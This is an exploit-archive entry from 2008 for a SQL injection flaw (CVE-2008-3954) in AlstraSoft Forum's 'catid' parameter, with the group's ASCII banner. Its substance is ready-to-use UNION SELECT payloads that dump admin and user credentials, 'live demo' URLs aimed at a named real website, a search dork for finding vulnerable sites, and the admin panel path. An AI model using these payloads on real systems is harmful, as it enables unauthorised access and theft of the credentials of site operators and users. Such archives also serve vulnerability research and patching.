Alstrasoft Forum - 'catid' SQL Injection



EKU-ID: 14289 CVE: CVE-2008-3954;OSVDB-48002 OSVDB-ID:
Author: r45c4l Published: 2008-09-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     #
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---#
################################################################
#
# Author: r45c4l
#
# Home  : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Alstrasoft Forum (forum_catview&catid) Remote SQL Injection Vulnerability
#
#
# App Name:  AlstraSoft Forum
#
# App Home: http://www.alstrasoft.com/
#
# Dork1: Use ur brain
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
#
#
#
#
#
# POC: For Admin id and pass
#      index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
#
# P0C-2: For Users id and pass
#       index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
#
# Live Demo: (For admin)
#
# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(auser,0x3a,apass),7+from+admin--
#
# Live Demo: (For Users)
#
# http://payperpostpro.com/index.php?menu=forum_catview&catid=-1+union+all+select+1,2,3,4,5,concat(username,0x3a,upass),7+from+users--
#
# Admin panel is at http://site.com/admin
################################################################
# Vuln Discovered 9th Sep 2008

# milw0rm.com [2008-09-09]